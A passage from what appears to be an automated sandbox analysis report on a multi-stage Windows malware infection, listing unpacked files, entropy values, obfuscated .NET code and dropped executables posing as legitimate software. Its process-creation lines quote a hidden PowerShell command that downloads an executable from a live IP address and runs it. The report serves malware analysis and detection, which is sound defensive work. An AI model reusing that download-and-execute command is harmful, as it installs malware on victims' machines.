Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 4.2.skotes.exe.990000.0.unpack :EW;.rsrc:W;.idata :W; :EW;hxbwlokj:EW;fwohzanq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;hxbwlokj:EW;fwohzanq:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 5.2.skotes.exe.990000.0.unpack :EW;.rsrc:W;.idata :W; :EW;hxbwlokj:EW;fwohzanq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;hxbwlokj:EW;fwohzanq:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 10.2.skotes.exe.990000.0.unpack :EW;.rsrc:W;.idata :W; :EW;hxbwlokj:EW;fwohzanq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;hxbwlokj:EW;fwohzanq:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe Unpacked PE file: 54.2.crossplatformplayer.exe.400000.0.unpack .text:EW;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
Source: C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe Unpacked PE file: 54.2.crossplatformplayer.exe.400000.0.unpack
Source: ugdKEDU[1].exe.10.dr, WS36uhldRk15BMqR9l.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{QCGNJZTm7XRc6fgjQf0(typeof(IntPtr).TypeHandle),typeof(Type)})
Source: ugdKEDU.exe.10.dr, WS36uhldRk15BMqR9l.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{QCGNJZTm7XRc6fgjQf0(typeof(IntPtr).TypeHandle),typeof(Type)})
Source: 31.2.ugdKEDU.exe.3c19550.0.raw.unpack, WS36uhldRk15BMqR9l.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{QCGNJZTm7XRc6fgjQf0(typeof(IntPtr).TypeHandle),typeof(Type)})
Source: ugdKEDU[1].exe.10.dr, QcapXlsQaOUTcM6d72A.cs .Net Code: IXR09cJLII
Source: ugdKEDU[1].exe.10.dr, QcapXlsQaOUTcM6d72A.cs .Net Code: vK9cjiltfI
Source: ugdKEDU.exe.10.dr, QcapXlsQaOUTcM6d72A.cs .Net Code: IXR09cJLII
Source: ugdKEDU.exe.10.dr, QcapXlsQaOUTcM6d72A.cs .Net Code: vK9cjiltfI
Source: 31.2.ugdKEDU.exe.3c19550.0.raw.unpack, QcapXlsQaOUTcM6d72A.cs .Net Code: IXR09cJLII
Source: 31.2.ugdKEDU.exe.3c19550.0.raw.unpack, QcapXlsQaOUTcM6d72A.cs .Net Code: vK9cjiltfI
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'OETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'OETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d; Jump to behavior
Source: ugdKEDU[1].exe.10.dr Static PE information: 0xE73D5611 [Mon Dec 8 06:37:05 2092 UTC]
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Code function: 11_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress, 11_2_00406328
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: b191a8c87b.exe.10.dr Static PE information: real checksum: 0x1e4f75 should be: 0x1ea13b
Source: random[1].exe1.10.dr Static PE information: real checksum: 0x1c7038 should be: 0x1c56ad
Source: 0269e2f5f3.exe.10.dr Static PE information: real checksum: 0x1c1351 should be: 0x1c437b
Source: 4db43293bc.exe.10.dr Static PE information: real checksum: 0x1d8f5b should be: 0x1dce60
Source: jrgXmS0.exe.10.dr Static PE information: real checksum: 0xe407d should be: 0xe185c
Source: jrgXmS0[1].exe.10.dr Static PE information: real checksum: 0xe407d should be: 0xe185c
Source: tYrnx75[1].exe.10.dr Static PE information: real checksum: 0xdfde2 should be: 0xd54e7
Source: stail.exe.10.dr Static PE information: real checksum: 0x0 should be: 0x3886e4
Source: random[1].exe2.10.dr Static PE information: real checksum: 0x1d8f5b should be: 0x1dce60
Source: stail[1].exe.10.dr Static PE information: real checksum: 0x0 should be: 0x3886e4
Source: random[1].exe0.10.dr Static PE information: real checksum: 0x1e4f75 should be: 0x1ea13b
Source: is-T56MS.tmp.30.dr Static PE information: real checksum: 0x0 should be: 0x73dfcd
Source: TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE.1.dr Static PE information: real checksum: 0x1d58e1 should be: 0x1d6862
Source: random[2].exe.10.dr Static PE information: real checksum: 0x1c1351 should be: 0x1c437b
Source: tYrnx75.exe.10.dr Static PE information: real checksum: 0xdfde2 should be: 0xd54e7
Source: 8fb472f3d3.exe.10.dr Static PE information: real checksum: 0x1c7038 should be: 0x1c56ad
Source: LCESjzR.tmp.29.dr Static PE information: real checksum: 0x0 should be: 0x357c1c
Source: ugdKEDU[1].exe.10.dr Static PE information: real checksum: 0x42662 should be: 0x614a4
Source: skotes.exe.3.dr Static PE information: real checksum: 0x1d58e1 should be: 0x1d6862
Source: ugdKEDU.exe.10.dr Static PE information: real checksum: 0x42662 should be: 0x614a4
Source: TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE.1.dr Static PE information: section name:
Source: TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE.1.dr Static PE information: section name: .idata
Source: TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE.1.dr Static PE information: section name:
Source: TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE.1.dr Static PE information: section name: hxbwlokj
Source: TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE.1.dr Static PE information: section name: fwohzanq
Source: TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE.1.dr Static PE information: section name: .taggant
Source: skotes.exe.3.dr Static PE information: section name:
Source: skotes.exe.3.dr Static PE information: section name: .idata
Source: skotes.exe.3.dr Static PE information: section name:
Source: skotes.exe.3.dr Static PE information: section name: hxbwlokj
Source: skotes.exe.3.dr Static PE information: section name: fwohzanq
Source: skotes.exe.3.dr Static PE information: section name: .taggant
Source: 4db43293bc.exe.10.dr Static PE information: section name:
Source: 4db43293bc.exe.10.dr Static PE information: section name: .idata
Source: 4db43293bc.exe.10.dr Static PE information: section name:
Source: 4db43293bc.exe.10.dr Static PE information: section name: ooydwvsw
Source: 4db43293bc.exe.10.dr Static PE information: section name: lonnmldt
Source: 4db43293bc.exe.10.dr Static PE information: section name: .taggant
Source: random[1].exe0.10.dr Static PE information: section name:
Source: random[1].exe0.10.dr Static PE information: section name: .idata
Source: random[1].exe0.10.dr Static PE information: section name:
Source: random[1].exe0.10.dr Static PE information: section name: nmmtmocg
Source: random[1].exe0.10.dr Static PE information: section name: yvxloaht
Source: random[1].exe0.10.dr Static PE information: section name: .taggant
Source: b191a8c87b.exe.10.dr Static PE information: section name:
Source: b191a8c87b.exe.10.dr Static PE information: section name: .idata
Source: b191a8c87b.exe.10.dr Static PE information: section name:
Source: b191a8c87b.exe.10.dr Static PE information: section name: nmmtmocg
Source: b191a8c87b.exe.10.dr Static PE information: section name: yvxloaht
Source: b191a8c87b.exe.10.dr Static PE information: section name: .taggant
Source: random[1].exe1.10.dr Static PE information: section name:
Source: random[1].exe1.10.dr Static PE information: section name: .idata
Source: random[1].exe1.10.dr Static PE information: section name:
Source: random[1].exe1.10.dr Static PE information: section name: jttzozln
Source: random[1].exe1.10.dr Static PE information: section name: dydxuimv
Source: random[1].exe1.10.dr Static PE information: section name: .taggant
Source: 8fb472f3d3.exe.10.dr Static PE information: section name:
Source: 8fb472f3d3.exe.10.dr Static PE information: section name: .idata
Source: 8fb472f3d3.exe.10.dr Static PE information: section name:
Source: 8fb472f3d3.exe.10.dr Static PE information: section name: jttzozln
Source: 8fb472f3d3.exe.10.dr Static PE information: section name: dydxuimv
Source: 8fb472f3d3.exe.10.dr Static PE information: section name: .taggant
Source: random[2].exe.10.dr Static PE information: section name:
Source: random[2].exe.10.dr Static PE information: section name: .idata
Source: random[2].exe.10.dr Static PE information: section name:
Source: random[2].exe.10.dr Static PE information: section name: pddznxyl
Source: random[2].exe.10.dr Static PE information: section name: kbgcpuhd
Source: random[2].exe.10.dr Static PE information: section name: .taggant
Source: 0269e2f5f3.exe.10.dr Static PE information: section name:
Source: 0269e2f5f3.exe.10.dr Static PE information: section name: .idata
Source: 0269e2f5f3.exe.10.dr Static PE information: section name:
Source: 0269e2f5f3.exe.10.dr Static PE information: section name: pddznxyl
Source: 0269e2f5f3.exe.10.dr Static PE information: section name: kbgcpuhd
Source: 0269e2f5f3.exe.10.dr Static PE information: section name: .taggant
Source: LCESjzR[1].exe.10.dr Static PE information: section name: .didata
Source: LCESjzR.exe.10.dr Static PE information: section name: .didata
Source: random[1].exe2.10.dr Static PE information: section name:
Source: random[1].exe2.10.dr Static PE information: section name: .idata
Source: random[1].exe2.10.dr Static PE information: section name:
Source: random[1].exe2.10.dr Static PE information: section name: ooydwvsw
Source: random[1].exe2.10.dr Static PE information: section name: lonnmldt
Source: random[1].exe2.10.dr Static PE information: section name: .taggant
Source: LCESjzR.tmp.29.dr Static PE information: section name: .didata
Source: is-LV70G.tmp.30.dr Static PE information: section name: .rodata
Source: is-LV70G.tmp.30.dr Static PE information: section name: _RDATA
Source: is-RCAI0.tmp.30.dr Static PE information: section name: .rodata
Source: is-RCAI0.tmp.30.dr Static PE information: section name: _RDATA
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 10_2_009AD91C push ecx; ret 10_2_009AD92F
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_00940DE6 push ecx; ret 28_2_00940DF9
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Code function: 31_2_02A47BA6 push ecx; ret 31_2_02A47BB2
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Code function: 31_2_02A43EAA push cs; retf 31_2_02A43EB9
Source: TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE.1.dr Static PE information: section name: entropy: 7.984515340873373
Source: TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE.1.dr Static PE information: section name: hxbwlokj entropy: 7.9540477201720305
Source: skotes.exe.3.dr Static PE information: section name: entropy: 7.984515340873373
Source: skotes.exe.3.dr Static PE information: section name: hxbwlokj entropy: 7.9540477201720305
Source: 4db43293bc.exe.10.dr Static PE information: section name: entropy: 7.984684993420552
Source: 4db43293bc.exe.10.dr Static PE information: section name: ooydwvsw entropy: 7.953312463989029
Source: random[1].exe0.10.dr Static PE information: section name: nmmtmocg entropy: 7.948413942256694
Source: b191a8c87b.exe.10.dr Static PE information: section name: nmmtmocg entropy: 7.948413942256694
Source: random[1].exe1.10.dr Static PE information: section name: entropy: 7.983433942739773
Source: random[1].exe1.10.dr Static PE information: section name: jttzozln entropy: 7.952943070586376
Source: 8fb472f3d3.exe.10.dr Static PE information: section name: entropy: 7.983433942739773
Source: 8fb472f3d3.exe.10.dr Static PE information: section name: jttzozln entropy: 7.952943070586376
Source: random[2].exe.10.dr Static PE information: section name: pddznxyl entropy: 7.953056308834811
Source: 0269e2f5f3.exe.10.dr Static PE information: section name: pddznxyl entropy: 7.953056308834811
Source: random[1].exe2.10.dr Static PE information: section name: entropy: 7.984684993420552
Source: random[1].exe2.10.dr Static PE information: section name: ooydwvsw entropy: 7.953312463989029
Source: ugdKEDU[1].exe.10.dr, SX7VHXsUw02CIOBEHMt.cs High entropy of concatenated method names: 'yPnsD4TnOx', 'dXusyMG1aA', 'o3ismIfVR8', 'kP1sEIhXrK', 'mqfska4Qvx', 'C36sotIQsQ', 'rRasPCPoK8', 'sBqs8LZ6Rt', 'nPqs79L3Nh', 'FFrsbQX4xG'
Source: ugdKEDU[1].exe.10.dr, QcapXlsQaOUTcM6d72A.cs High entropy of concatenated method names: 'XxeM7tarU5', 'vinMbvFplH', 'cViMQb2cJK', 'u9uMv6dVWb', 'MLbMViHlSa', 'FomMifG1RJ', 'LtkMA23hmd', 'bxaXX4VaGP', 'qg9MSmYjxU', 'quVMBikCSy'
Source: ugdKEDU[1].exe.10.dr, T4D7CLsdBY5USblHXPJ.cs High entropy of concatenated method names: 'G7d1a0Fg4E', 'QW8QRVdM9XhwD4KOpJ0', 'peIfPNdNCG1d3DZTxSe', 'tTJfgtdukweQE8CgfnF', 'cM23bAdxoF512v5GYph', 'MWmxkkdc2ljstBYdFqI'
Source: ugdKEDU[1].exe.10.dr, WS36uhldRk15BMqR9l.cs High entropy of concatenated method names: 'WafGmnTa34nDiqJLIUu', 'sNkakTTqkS3CcudO9wQ', 'tWmg2rjfPX', 'rQ7XTBTG9J2qD190dlr', 'fHWlxHTOrZ80BKuh86A', 'WiRsW5T4Jm2UFiKVXmh', 'Y3sBLUTtw3jwZSiZsYl', 'nW4lBacjpc', 'BRLsfrdFc8', 'tHFsgjAiBB'
Source: ugdKEDU.exe.10.dr, SX7VHXsUw02CIOBEHMt.cs High entropy of concatenated method names: 'yPnsD4TnOx', 'dXusyMG1aA', 'o3ismIfVR8', 'kP1sEIhXrK', 'mqfska4Qvx', 'C36sotIQsQ', 'rRasPCPoK8', 'sBqs8LZ6Rt', 'nPqs79L3Nh', 'FFrsbQX4xG'
Source: ugdKEDU.exe.10.dr, QcapXlsQaOUTcM6d72A.cs High entropy of concatenated method names: 'XxeM7tarU5', 'vinMbvFplH', 'cViMQb2cJK', 'u9uMv6dVWb', 'MLbMViHlSa', 'FomMifG1RJ', 'LtkMA23hmd', 'bxaXX4VaGP', 'qg9MSmYjxU', 'quVMBikCSy'
Source: ugdKEDU.exe.10.dr, T4D7CLsdBY5USblHXPJ.cs High entropy of concatenated method names: 'G7d1a0Fg4E', 'QW8QRVdM9XhwD4KOpJ0', 'peIfPNdNCG1d3DZTxSe', 'tTJfgtdukweQE8CgfnF', 'cM23bAdxoF512v5GYph', 'MWmxkkdc2ljstBYdFqI'
Source: ugdKEDU.exe.10.dr, WS36uhldRk15BMqR9l.cs High entropy of concatenated method names: 'WafGmnTa34nDiqJLIUu', 'sNkakTTqkS3CcudO9wQ', 'tWmg2rjfPX', 'rQ7XTBTG9J2qD190dlr', 'fHWlxHTOrZ80BKuh86A', 'WiRsW5T4Jm2UFiKVXmh', 'Y3sBLUTtw3jwZSiZsYl', 'nW4lBacjpc', 'BRLsfrdFc8', 'tHFsgjAiBB'
Source: 31.2.ugdKEDU.exe.3c19550.0.raw.unpack, SX7VHXsUw02CIOBEHMt.cs High entropy of concatenated method names: 'yPnsD4TnOx', 'dXusyMG1aA', 'o3ismIfVR8', 'kP1sEIhXrK', 'mqfska4Qvx', 'C36sotIQsQ', 'rRasPCPoK8', 'sBqs8LZ6Rt', 'nPqs79L3Nh', 'FFrsbQX4xG'
Source: 31.2.ugdKEDU.exe.3c19550.0.raw.unpack, QcapXlsQaOUTcM6d72A.cs High entropy of concatenated method names: 'XxeM7tarU5', 'vinMbvFplH', 'cViMQb2cJK', 'u9uMv6dVWb', 'MLbMViHlSa', 'FomMifG1RJ', 'LtkMA23hmd', 'bxaXX4VaGP', 'qg9MSmYjxU', 'quVMBikCSy'
Source: 31.2.ugdKEDU.exe.3c19550.0.raw.unpack, T4D7CLsdBY5USblHXPJ.cs High entropy of concatenated method names: 'G7d1a0Fg4E', 'QW8QRVdM9XhwD4KOpJ0', 'peIfPNdNCG1d3DZTxSe', 'tTJfgtdukweQE8CgfnF', 'cM23bAdxoF512v5GYph', 'MWmxkkdc2ljstBYdFqI'
Source: 31.2.ugdKEDU.exe.3c19550.0.raw.unpack, WS36uhldRk15BMqR9l.cs High entropy of concatenated method names: 'WafGmnTa34nDiqJLIUu', 'sNkakTTqkS3CcudO9wQ', 'tWmg2rjfPX', 'rQ7XTBTG9J2qD190dlr', 'fHWlxHTOrZ80BKuh86A', 'WiRsW5T4Jm2UFiKVXmh', 'Y3sBLUTtw3jwZSiZsYl', 'nW4lBacjpc', 'BRLsfrdFc8', 'tHFsgjAiBB'

Persistence and Installation Behavior

barindex
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\567757\Appeal.com Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com File created: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Jump to dropped file
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'OETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'OETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d; Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1053670001\8fb472f3d3.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\libGLESv2.dll (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\Qt5PrintSupport.dll (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1053669001\b191a8c87b.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-7SCO6.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\msvcr100.dll (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\uninstall\is-8C04K.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\jrgXmS0[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp File created: C:\Users\user\AppData\Local\Temp\is-9JA86.tmp\_isetup\_setup64.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\ugdKEDU[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[2].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[2].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp File created: C:\Users\user\AppData\Local\Temp\is-9JA86.tmp\driver3.exe (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\icuin51.dll (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-JO5R4.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-9J3SL.tmp Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1053672001\c9cd3322a0.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\sqlite3.dll (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1053662101\1e9cc73e62.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\libEGL.dll (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp File created: C:\Users\user\AppData\Roaming\ZoomUs\Nda0ProtocolZoom.dll (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-LGLQ2.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1053579001\4db43293bc.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com File created: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp File created: C:\Users\user\AppData\Roaming\ZoomUs\is-LV70G.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe File created: C:\ProgramData\CrossPlatformPlayer\CrossPlatformPlayer.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp File created: C:\Users\user\AppData\Roaming\ZoomUs\EOSSDK-Win64-Shipping.dll (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-U772O.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1053476001\stail.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\LCESjzR[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1052838001\LCESjzR.exe File created: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\msvcp100.dll (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp File created: C:\Users\user\AppData\Local\Temp\is-5IJJ6.tmp\_isetup\_setup64.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1053063001\jrgXmS0.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1053476001\stail.exe File created: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-NNPOE.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\tYrnx75[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-O3JN0.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp File created: C:\Users\user\AppData\Local\Temp\is-9JA86.tmp\is-T56MS.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\uninstall\unins000.exe (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\stail[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-MJUM6.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp File created: C:\Users\user\AppData\Local\Temp\is-5IJJ6.tmp\_isetup\_shfoldr.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp File created: C:\Users\user\AppData\Local\Temp\is-5IJJ6.tmp\_isetup\_iscrypt.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\icuuc51.dll (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\Qt5Concurrent.dll (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1053671001\0269e2f5f3.exe Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-R7PP0.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1052838001\LCESjzR.exe Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\567757\Appeal.com Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp File created: C:\Users\user\AppData\Roaming\ZoomUs\is-RCAI0.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe File created: C:\ProgramData\CrossPlatformPlayer\sqlite3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe File created: C:\ProgramData\CrossPlatformPlayer\sqlite3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe File created: C:\ProgramData\CrossPlatformPlayer\CrossPlatformPlayer.exe Jump to dropped file

Boot Survival

barindex
